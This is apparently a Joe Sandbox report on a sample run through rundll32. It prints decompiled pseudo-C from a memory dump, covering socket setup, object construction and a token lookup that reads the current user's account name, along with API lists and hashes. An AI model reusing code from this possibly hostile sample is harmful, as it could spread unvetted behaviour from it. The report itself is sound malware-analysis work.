                                                                                              • Instruction Fuzzy Hash: BB414872A00A02EFCB15EF69E984BA4B7B5FF18314F040295E90997A51D771F8B1CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0426D020: StrChrW.SHLWAPI(?,0000003A), ref: 0426D044
                                                                                              • WSASetLastError.WS2_32(0000273F,?,?), ref: 0426DAB6
                                                                                                • Part of subcall function 0426D0D0: WSASetLastError.WS2_32(00002741), ref: 0426D0FA
                                                                                              • socket.WS2_32(00000000,00000002,00000011), ref: 0426DAD9
                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 0426DB06
                                                                                              • WSAGetLastError.WS2_32 ref: 0426DB11
                                                                                              • WSACreateEvent.WS2_32 ref: 0426DB31
                                                                                                • Part of subcall function 04257AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 04257ADE
                                                                                                • Part of subcall function 04257AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0426FA53
                                                                                                • Part of subcall function 04257AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0426FA7B
                                                                                                • Part of subcall function 04257AC0: SetLastError.KERNEL32(0000139F,?,042583DB,80004005,?,042587F8,04258B6E,00000000,?), ref: 0426FA87
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                              • String ID:
                                                                                              • API String ID: 688454317-0
                                                                                              • Opcode ID: e46fbb7052dac0f95b279a4e9a9120952a5ba124fd65b73411190ee17889bc67
                                                                                              • Instruction ID: cc753b3334ed68b607e77bed46b58aefb9107e471aaf984ff33419378bba7049
                                                                                              • Opcode Fuzzy Hash: e46fbb7052dac0f95b279a4e9a9120952a5ba124fd65b73411190ee17889bc67
                                                                                              • Instruction Fuzzy Hash: D6318475B24209ABEB24EFA5E894BAA7368EF44314F104169E907D72D0EB70BD81CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 30%
                                                                                              			E04258240(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                                                              				void* _t54;
                                                                                              				void* _t60;
                                                                                              				intOrPtr _t61;
                                                                                              				intOrPtr _t62;
                                                                                              				void* _t67;
                                                                                              				void* _t84;
                                                                                              				void* _t85;
                                                                                              				void* _t86;
                                                                                              				intOrPtr* _t89;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t91;
                                                                                              				void* _t93;
                                                                                              				intOrPtr* _t94;
                                                                                              				intOrPtr* _t98;
                                                                                              				intOrPtr* _t99;
                                                                                              				intOrPtr* _t101;
                                                                                              				void* _t105;
                                                                                              				void* _t109;
                                                                                              
                                                                                              				_t89 = __ecx;
                                                                                              				_t88 = __ebx;
                                                                                              				_t105 = _t109;
                                                                                              				_t93 = CreateEventW;
                                                                                              				_t98 = __ecx;
                                                                                              				 *__ecx = 0x429e1b0;
                                                                                              				_t54 = CreateEventW(0, 1, 1, 0);
                                                                                              				 *(_t98 + 4) = _t54;
                                                                                              				if(_t54 == 0) {
                                                                                              					_push(0x80004005);
                                                                                              					E04257AC0();
                                                                                              					goto L7;
                                                                                              				} else {
                                                                                              					_t3 = _t98 + 0x5c; // 0x60
                                                                                              					_t91 = _t3;
                                                                                              					 *((intOrPtr*)(_t98 + 8)) = _a4;
                                                                                              					 *(_t98 + 0xc) = 1;
                                                                                              					 *((intOrPtr*)(_t98 + 0x10)) = 5;
                                                                                              					 *(_t98 + 0x14) = 0;
                                                                                              					 *(_t98 + 0x18) = 1;
                                                                                              					 *((intOrPtr*)(_t98 + 0x1c)) = 0xffffffff;
                                                                                              					 *(_t98 + 0x20) = 0;
                                                                                              					 *(_t98 + 0x24) = 0;
                                                                                              					 *(_t98 + 0x28) = 1;
                                                                                              					 *((intOrPtr*)(_t98 + 0x2c)) = 0x598;
                                                                                              					 *((intOrPtr*)(_t98 + 0x30)) = 0x3c;
                                                                                              					 *((intOrPtr*)(_t98 + 0x34)) = 0x3c;
                                                                                              					 *((intOrPtr*)(_t98 + 0x38)) = 3;
                                                                                              					 *((intOrPtr*)(_t98 + 0x3c)) = 0xea60;
                                                                                              					 *(_t98 + 0x40) = 0;
                                                                                              					 *(_t98 + 0x44) = 0;
                                                                                              					 *(_t98 + 0x48) = 0;
                                                                                              					 *(_t98 + 0x4c) = 0;
                                                                                              					 *((intOrPtr*)(_t98 + 0x50)) = 3;
                                                                                              					 *(_t98 + 0x54) = 0;
                                                                                              					 *(_t98 + 0x58) = 0;
                                                                                              					 *_t91 = 0;
                                                                                              					_t91[1] = 0;
                                                                                              					_t91[2] = 0;
                                                                                              					E0425ADA0(_t91, 0, _t91, 0);
                                                                                              					_t109 = _t109 - 0xc;
                                                                                              					_t27 = _t98 + 0x68; // 0x6c
                                                                                              					_t88 = _t27;
                                                                                              					_t89 = _t88;
                                                                                              					E0425ABB0(_t89, CreateEventW, __ebx);
                                                                                              					_t28 = _t98 + 0x14c; // 0x150
                                                                                              					 *(_t98 + 0x148) = 0;
                                                                                              					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                                                              						L7:
                                                                                              						_push(0x80004005);
                                                                                              						E04257AC0();
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *(_t98 + 0x168) = 0;
                                                                                              						 *(_t98 + 0x16c) = 0;
                                                                                              						 *(_t98 + 0x164) = 0;
                                                                                              						 *((intOrPtr*)(_t98 + 0x170)) = _t88;
                                                                                              						_t84 = CreateEventW(0, 0, 0, 0);
                                                                                              						 *(_t98 + 0x174) = _t84;
                                                                                              						_pop(_t88);
                                                                                              						if(_t84 == 0) {
                                                                                              							L8:
                                                                                              							_push(0x80004005);
                                                                                              							E04257AC0();
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							_t85 = CreateEventW(0, 0, 0, 0);
                                                                                              							 *(_t98 + 0x178) = _t85;
                                                                                              							if(_t85 == 0) {
                                                                                              								L9:
                                                                                              								_push(0x80004005);
                                                                                              								E04257AC0();
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								_t86 = CreateEventW(0, 0, 0, 0);
                                                                                              								 *(_t98 + 0x17c) = _t86;
                                                                                              								if(_t86 == 0) {
                                                                                              									L10:
                                                                                              									_push(0x80004005);
                                                                                              									E04257AC0();
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									_push(_t98);
                                                                                              									_t99 = _t89;
                                                                                              									_push(_t93);
                                                                                              									 *_t99 = 0x429e1b0;
                                                                                              									if( *((intOrPtr*)(_t99 + 0x50)) != 3) {
                                                                                              										E0426E6F0(_t89);
                                                                                              									}
                                                                                              									_t60 =  *(_t99 + 0x17c);
                                                                                              									_t94 = CloseHandle;
                                                                                              									if(_t60 == 0 || CloseHandle(_t60) != 0) {
                                                                                              										_t61 =  *((intOrPtr*)(_t99 + 0x178));
                                                                                              										if(_t61 == 0) {
                                                                                              											L17:
                                                                                              											_t62 =  *((intOrPtr*)(_t99 + 0x174));
                                                                                              											if(_t62 == 0) {
                                                                                              												L19:
                                                                                              												E0425AC60(_t99 + 0x164);
                                                                                              												DeleteCriticalSection(_t99 + 0x14c);
                                                                                              												_t89 = _t99 + 0x68;
                                                                                              												E0425AB40(_t88, _t89);
                                                                                              												_t66 =  *(_t99 + 0x5c);
                                                                                              												if( *(_t99 + 0x5c) != 0) {
                                                                                              													L0427ED17(_t66);
                                                                                              													_t109 = _t109 + 4;
                                                                                              													 *(_t99 + 0x5c) = 0;
                                                                                              													 *(_t99 + 0x60) = 0;
                                                                                              													 *(_t99 + 0x64) = 0;
                                                                                              												}
                                                                                              												_t67 =  *(_t99 + 4);
                                                                                              												if(_t67 == 0) {
                                                                                              													L23:
                                                                                              													 *_t99 = 0x429dfa4;
                                                                                              													return _t67;
                                                                                              												} else {
                                                                                              													_t67 = CloseHandle(_t67);
                                                                                              													if(_t67 == 0) {
                                                                                              														goto L27;
                                                                                              													} else {
                                                                                              														goto L23;
                                                                                              													}
                                                                                              												}
                                                                                              											} else {
                                                                                              												_push(_t62);
                                                                                              												if( *_t94() == 0) {
                                                                                              													goto L26;
                                                                                              												} else {
                                                                                              													goto L19;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_push(_t61);
                                                                                              											if( *_t94() == 0) {
                                                                                              												goto L25;
                                                                                              											} else {
                                                                                              												goto L17;
                                                                                              											}
                                                                                              										}
                                                                                              									} else {
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L25:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L26:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L27:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										_push(_t105);
                                                                                              										_push(_t99);
                                                                                              										_t101 = _t89;
                                                                                              										L11();
                                                                                              										if((_a8 & 0x00000001) != 0) {
                                                                                              											_push(0x18c);
                                                                                              											E04275B47(_t101);
                                                                                              										}
                                                                                              										return _t101;
                                                                                              									}
                                                                                              								} else {
                                                                                              									 *(_t98 + 0x180) = 0;
                                                                                              									 *(_t98 + 0x184) = 0;
                                                                                              									 *(_t98 + 0x188) = 0;
                                                                                              									return _t98;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x04258240
                                                                                              0x04258240
                                                                                              0x04258241
                                                                                              0x04258245
                                                                                              0x0425824b
                                                                                              0x04258255
                                                                                              0x0425825b
                                                                                              0x0425825d
                                                                                              0x04258262
                                                                                              0x042583d1
                                                                                              0x042583d6
                                                                                              0x00000000
                                                                                              0x04258268
                                                                                              0x0425826b
                                                                                              0x0425826b
                                                                                              0x0425826e
                                                                                              0x04258271
                                                                                              0x04258278
                                                                                              0x0425827f
                                                                                              0x04258286
                                                                                              0x0425828e
                                                                                              0x04258295
                                                                                              0x0425829c
                                                                                              0x042582a3
                                                                                              0x042582aa
                                                                                              0x042582b1
                                                                                              0x042582b8
                                                                                              0x042582bf
                                                                                              0x042582c6
                                                                                              0x042582cd
                                                                                              0x042582d4
                                                                                              0x042582db
                                                                                              0x042582e4
                                                                                              0x042582eb
                                                                                              0x042582f2
                                                                                              0x042582f9
                                                                                              0x04258303
                                                                                              0x04258309
                                                                                              0x04258310
                                                                                              0x04258317
                                                                                              0x0425831c
                                                                                              0x0425831f
                                                                                              0x0425831f
                                                                                              0x04258322
                                                                                              0x04258324
                                                                                              0x0425832b
                                                                                              0x04258331
                                                                                              0x04258344
                                                                                              0x042583db
                                                                                              0x042583db
                                                                                              0x042583e0
                                                                                              0x00000000
                                                                                              0x0425834a
                                                                                              0x04258352
                                                                                              0x0425835c
                                                                                              0x04258366
                                                                                              0x04258370
                                                                                              0x04258376
                                                                                              0x04258378
                                                                                              0x0425837e
                                                                                              0x04258381
                                                                                              0x042583e5
                                                                                              0x042583e5
                                                                                              0x042583ea
                                                                                              0x00000000
                                                                                              0x04258383
                                                                                              0x0425838b
                                                                                              0x0425838d
                                                                                              0x04258395
                                                                                              0x042583ef
                                                                                              0x042583ef
                                                                                              0x042583f4
                                                                                              0x00000000
                                                                                              0x04258397
                                                                                              0x0425839f
                                                                                              0x042583a1
                                                                                              0x042583a9
                                                                                              0x042583f9
                                                                                              0x042583f9
                                                                                              0x042583fe
                                                                                              0x04258403
                                                                                              0x04258404
                                                                                              0x04258405
                                                                                              0x04258406
                                                                                              0x04258407
                                                                                              0x04258408
                                                                                              0x04258409
                                                                                              0x0425840a
                                                                                              0x0425840b
                                                                                              0x0425840c
                                                                                              0x0425840d
                                                                                              0x0425840e
                                                                                              0x0425840f
                                                                                              0x04258410
                                                                                              0x04258411
                                                                                              0x04258413
                                                                                              0x04258418
                                                                                              0x0425841e
                                                                                              0x04258420
                                                                                              0x04258420
                                                                                              0x04258425
                                                                                              0x0425842b
                                                                                              0x04258433
                                                                                              0x0425843c
                                                                                              0x04258444
                                                                                              0x0425844d
                                                                                              0x0425844d
                                                                                              0x04258455
                                                                                              0x0425845e
                                                                                              0x04258464
                                                                                              0x04258470
                                                                                              0x04258476
                                                                                              0x04258479
                                                                                              0x0425847e
                                                                                              0x04258483
                                                                                              0x04258486
                                                                                              0x0425848b
                                                                                              0x0425848e
                                                                                              0x04258495
                                                                                              0x0425849c
                                                                                              0x0425849c
                                                                                              0x042584a3
                                                                                              0x042584a8
                                                                                              0x042584b1
                                                                                              0x042584b2
                                                                                              0x042584b9
                                                                                              0x042584aa
                                                                                              0x042584ab
                                                                                              0x042584af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042584af
                                                                                              0x04258457
                                                                                              0x04258457
                                                                                              0x0425845c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425845c
                                                                                              0x04258446
                                                                                              0x04258446
                                                                                              0x0425844b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425844b
                                                                                              0x042584ba
                                                                                              0x042584ba
                                                                                              0x042584bf
                                                                                              0x042584c4
                                                                                              0x042584c4
                                                                                              0x042584c9
                                                                                              0x042584ce
                                                                                              0x042584ce
                                                                                              0x042584d3
                                                                                              0x042584d8
                                                                                              0x042584d8
                                                                                              0x042584dd
                                                                                              0x042584e2
                                                                                              0x042584e3
                                                                                              0x042584e4
                                                                                              0x042584e5
                                                                                              0x042584e6
                                                                                              0x042584e7
                                                                                              0x042584e8
                                                                                              0x042584e9
                                                                                              0x042584ea
                                                                                              0x042584eb
                                                                                              0x042584ec
                                                                                              0x042584ed
                                                                                              0x042584ee
                                                                                              0x042584ef
                                                                                              0x042584f0
                                                                                              0x042584f3
                                                                                              0x042584f4
                                                                                              0x042584f6
                                                                                              0x042584ff
                                                                                              0x04258501
                                                                                              0x04258507
                                                                                              0x0425850c
                                                                                              0x04258513
                                                                                              0x04258513
                                                                                              0x042583ab
                                                                                              0x042583ab
                                                                                              0x042583b7
                                                                                              0x042583c2
                                                                                              0x042583ce
                                                                                              0x042583ce
                                                                                              0x042583a9
                                                                                              0x04258395
                                                                                              0x04258381
                                                                                              0x04258344

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,042587F8,04258B6E,00000000,?,?,04258B6E,0429E024,?), ref: 0425825B
                                                                                                • Part of subcall function 0425ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04258329,?,04258B6E,0429E024,?), ref: 0425ABD5
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000150,00000000,?,04258B6E,0429E024,?), ref: 0425833C
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04258B6E,0429E024,?), ref: 04258376
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04258B6E,0429E024,?), ref: 0425838B
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0425839F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 1949328396-0
                                                                                              • Opcode ID: d47499ffbc7a0728155fb73c82cda7d48d134857d3e5693de40546a5718f965a
                                                                                              • Instruction ID: f075bffe15b63f69477745cf685d6014871132de7618856038a995cac64965ff
                                                                                              • Opcode Fuzzy Hash: d47499ffbc7a0728155fb73c82cda7d48d134857d3e5693de40546a5718f965a
                                                                                              • Instruction Fuzzy Hash: 3641ADB0251B01ABF3309F25CC59747BBE4AB00708F50491DE69AAA6D0D7F6B148CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E04264440(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v520;
                                                                                              				short _v1032;
                                                                                              				long _v1036;
                                                                                              				void* _v1040;
                                                                                              				long _v1044;
                                                                                              				long _v1048;
                                                                                              				union _SID_NAME_USE _v1052;
                                                                                              				signed int _t27;
                                                                                              				signed int _t51;
                                                                                              				signed short* _t59;
                                                                                              				void* _t64;
                                                                                              				void* _t65;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				signed int _t69;
                                                                                              
                                                                                              				_t56 = __ecx;
                                                                                              				_t27 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t27 ^ _t69;
                                                                                              				_t64 = __edx;
                                                                                              				_t67 = __ecx;
                                                                                              				E0427DEA0(__edx, __edx, 0, 0x208);
                                                                                              				_v1040 = 0;
                                                                                              				_v1036 = 0;
                                                                                              				E0427DEA0(_t64,  &_v520, 0, 0x200);
                                                                                              				E0427DEA0(_t64,  &_v1032, 0, 0x200);
                                                                                              				_v1044 = 0x100;
                                                                                              				_v1048 = 0x100;
                                                                                              				if(OpenProcessToken(_t67, 8,  &_v1040) == 0 || GetTokenInformation(_v1040, 1, 0, _v1036,  &_v1036) == 0 && GetLastError() != 0x7a) {
                                                                                              					L10:
                                                                                              					return E04275AFE(_v8 ^ _t69);
                                                                                              				} else {
                                                                                              					_push(_v1036);
                                                                                              					_t68 = E0427EF79(_t56);
                                                                                              					if(_t68 == 0) {
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						if(GetTokenInformation(_v1040, 1, _t68, _v1036,  &_v1036) == 0 || LookupAccountSidW(0,  *_t68,  &_v520,  &_v1048,  &_v1032,  &_v1044,  &_v1052) == 0) {
                                                                                              							L0427ED17(_t68);
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							_t59 =  &_v520;
                                                                                              							_t65 = _t64 - _t59;
                                                                                              							do {
                                                                                              								_t51 =  *_t59 & 0x0000ffff;
                                                                                              								_t59 =  &(_t59[1]);
                                                                                              								 *(_t65 + _t59 - 2) = _t51;
                                                                                              							} while (_t51 != 0);
                                                                                              							L0427ED17(_t68);
                                                                                              							return E04275AFE(_v8 ^ _t69);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}



















                                                                                              0x04264440
                                                                                              0x04264449
                                                                                              0x04264450
                                                                                              0x0426445a
                                                                                              0x0426445c
                                                                                              0x04264461
                                                                                              0x04264471
                                                                                              0x0426447e
                                                                                              0x04264488
                                                                                              0x0426449b
                                                                                              0x042644a3
                                                                                              0x042644b3
                                                                                              0x042644c9
                                                                                              0x042645a6
                                                                                              0x042645b7
                                                                                              0x042644ff
                                                                                              0x042644ff
                                                                                              0x0426450a
                                                                                              0x04264511
                                                                                              0x00000000
                                                                                              0x04264517
                                                                                              0x04264535
                                                                                              0x0426459e
                                                                                              0x00000000
                                                                                              0x04264568
                                                                                              0x04264568
                                                                                              0x04264570
                                                                                              0x04264572
                                                                                              0x04264572
                                                                                              0x04264575
                                                                                              0x04264578
                                                                                              0x0426457d
                                                                                              0x04264583
                                                                                              0x0426459c
                                                                                              0x0426459c
                                                                                              0x04264535
                                                                                              0x04264511

                                                                                              APIs
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 042644C1
                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 042644E6
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,74CB69A0), ref: 042644F0
                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 0426452D
                                                                                              • LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000100,?,00000100,?), ref: 0426455E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2790146286-0
                                                                                              • Opcode ID: c1e2e63bf431cc9ab010824a136ecb0f5d957d14e9354bac72db98ff5e8a4022
                                                                                              • Instruction ID: 86c15347730c3ff826f9707507df00e6a166ceed6f33dee47517dac6da45778f
                                                                                              • Opcode Fuzzy Hash: c1e2e63bf431cc9ab010824a136ecb0f5d957d14e9354bac72db98ff5e8a4022
                                                                                              • Instruction Fuzzy Hash: 4941A9B1A10119ABEB21EB64DC45FEA777DDF04304F4041E5EB49B6180DB746EC5CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 33%
                                                                                              			E04257F60(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                                                              				void* _t53;
                                                                                              				void* _t59;
                                                                                              				intOrPtr _t60;
                                                                                              				intOrPtr _t61;
                                                                                              				void* _t66;
                                                                                              				void* _t83;
                                                                                              				void* _t84;
                                                                                              				void* _t85;
                                                                                              				intOrPtr* _t88;
                                                                                              				struct _SECURITY_ATTRIBUTES** _t90;
                                                                                              				void* _t92;
                                                                                              				intOrPtr* _t93;
                                                                                              				intOrPtr* _t97;
                                                                                              				intOrPtr* _t98;
                                                                                              				intOrPtr* _t100;
                                                                                              				void* _t104;
                                                                                              				void* _t108;
                                                                                              
                                                                                              				_t88 = __ecx;
                                                                                              				_t87 = __ebx;
                                                                                              				_t104 = _t108;
                                                                                              				_t92 = CreateEventW;
                                                                                              				_t97 = __ecx;
                                                                                              				 *__ecx = 0x429e280;
                                                                                              				_t53 = CreateEventW(0, 1, 1, 0);
                                                                                              				 *(_t97 + 4) = _t53;
                                                                                              				if(_t53 == 0) {
                                                                                              					_push(0x80004005);
                                                                                              					E04257AC0();
                                                                                              					goto L7;
                                                                                              				} else {
                                                                                              					_t3 = _t97 + 0x5c; // 0x5c
                                                                                              					_t90 = _t3;
                                                                                              					 *((intOrPtr*)(_t97 + 8)) = _a4;
                                                                                              					 *(_t97 + 0xc) = 1;
                                                                                              					 *((intOrPtr*)(_t97 + 0x10)) = 5;
                                                                                              					 *(_t97 + 0x14) = 0;
                                                                                              					 *(_t97 + 0x18) = 1;
                                                                                              					 *((intOrPtr*)(_t97 + 0x1c)) = 0xffffffff;
                                                                                              					 *(_t97 + 0x20) = 0;
                                                                                              					 *(_t97 + 0x24) = 0;
                                                                                              					 *(_t97 + 0x28) = 1;
                                                                                              					 *((intOrPtr*)(_t97 + 0x2c)) = 0x1000;
                                                                                              					 *((intOrPtr*)(_t97 + 0x30)) = 0x3c;
                                                                                              					 *((intOrPtr*)(_t97 + 0x34)) = 0x3c;
                                                                                              					 *((intOrPtr*)(_t97 + 0x38)) = 0xea60;
                                                                                              					 *((intOrPtr*)(_t97 + 0x3c)) = 0x4e20;
                                                                                              					 *(_t97 + 0x40) = 0;
                                                                                              					 *(_t97 + 0x44) = 0;
                                                                                              					 *(_t97 + 0x48) = 0;
                                                                                              					 *(_t97 + 0x4c) = 0;
                                                                                              					 *((intOrPtr*)(_t97 + 0x50)) = 3;
                                                                                              					 *(_t97 + 0x54) = 0;
                                                                                              					 *(_t97 + 0x58) = 0;
                                                                                              					 *_t90 = 0;
                                                                                              					_t90[1] = 0;
                                                                                              					_t90[2] = 0;
                                                                                              					E0425ADA0(_t90, 0, _t90, 0);
                                                                                              					_t108 = _t108 - 0xc;
                                                                                              					_t27 = _t97 + 0x68; // 0x68
                                                                                              					_t87 = _t27;
                                                                                              					_t88 = _t87;
                                                                                              					E0425ABB0(_t88, CreateEventW, __ebx);
                                                                                              					_t28 = _t97 + 0x14c; // 0x14c
                                                                                              					 *(_t97 + 0x148) = 0;
                                                                                              					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                                                              						L7:
                                                                                              						_push(0x80004005);
                                                                                              						E04257AC0();
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *(_t97 + 0x168) = 0;
                                                                                              						 *(_t97 + 0x16c) = 0;
                                                                                              						 *(_t97 + 0x164) = 0;
                                                                                              						 *((intOrPtr*)(_t97 + 0x170)) = _t87;
                                                                                              						_t83 = CreateEventW(0, 0, 0, 0);
                                                                                              						 *(_t97 + 0x174) = _t83;
                                                                                              						_pop(_t87);
                                                                                              						if(_t83 == 0) {
                                                                                              							L8:
                                                                                              							_push(0x80004005);
                                                                                              							E04257AC0();
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							_t84 = CreateEventW(0, 0, 0, 0);
                                                                                              							 *(_t97 + 0x178) = _t84;
                                                                                              							if(_t84 == 0) {
                                                                                              								L9:
                                                                                              								_push(0x80004005);
                                                                                              								E04257AC0();
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								_t85 = CreateEventW(0, 0, 0, 0);
                                                                                              								 *(_t97 + 0x17c) = _t85;
                                                                                              								if(_t85 == 0) {
                                                                                              									L10:
                                                                                              									_push(0x80004005);
                                                                                              									E04257AC0();
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									asm("int3");
                                                                                              									_push(_t97);
                                                                                              									_t98 = _t88;
                                                                                              									_push(_t92);
                                                                                              									 *_t98 = 0x429e280;
                                                                                              									if( *((intOrPtr*)(_t98 + 0x50)) != 3) {
                                                                                              										E0426F850(_t88);
                                                                                              									}
                                                                                              									_t59 =  *(_t98 + 0x17c);
                                                                                              									_t93 = CloseHandle;
                                                                                              									if(_t59 == 0 || CloseHandle(_t59) != 0) {
                                                                                              										_t60 =  *((intOrPtr*)(_t98 + 0x178));
                                                                                              										if(_t60 == 0) {
                                                                                              											L17:
                                                                                              											_t61 =  *((intOrPtr*)(_t98 + 0x174));
                                                                                              											if(_t61 == 0) {
                                                                                              												L19:
                                                                                              												E0425AC60(_t98 + 0x164);
                                                                                              												DeleteCriticalSection(_t98 + 0x14c);
                                                                                              												_t88 = _t98 + 0x68;
                                                                                              												E0425AB40(_t87, _t88);
                                                                                              												_t65 =  *(_t98 + 0x5c);
                                                                                              												if( *(_t98 + 0x5c) != 0) {
                                                                                              													L0427ED17(_t65);
                                                                                              													_t108 = _t108 + 4;
                                                                                              													 *(_t98 + 0x5c) = 0;
                                                                                              													 *(_t98 + 0x60) = 0;
                                                                                              													 *(_t98 + 0x64) = 0;
                                                                                              												}
                                                                                              												_t66 =  *(_t98 + 4);
                                                                                              												if(_t66 == 0) {
                                                                                              													L23:
                                                                                              													 *_t98 = 0x429dfa4;
                                                                                              													return _t66;
                                                                                              												} else {
                                                                                              													_t66 = CloseHandle(_t66);
                                                                                              													if(_t66 == 0) {
                                                                                              														goto L27;
                                                                                              													} else {
                                                                                              														goto L23;
                                                                                              													}
                                                                                              												}
                                                                                              											} else {
                                                                                              												_push(_t61);
                                                                                              												if( *_t93() == 0) {
                                                                                              													goto L26;
                                                                                              												} else {
                                                                                              													goto L19;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_push(_t60);
                                                                                              											if( *_t93() == 0) {
                                                                                              												goto L25;
                                                                                              											} else {
                                                                                              												goto L17;
                                                                                              											}
                                                                                              										}
                                                                                              									} else {
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L25:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L26:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										L27:
                                                                                              										_push(0x80004005);
                                                                                              										E04257AC0();
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
                                                                                              										asm("int3");
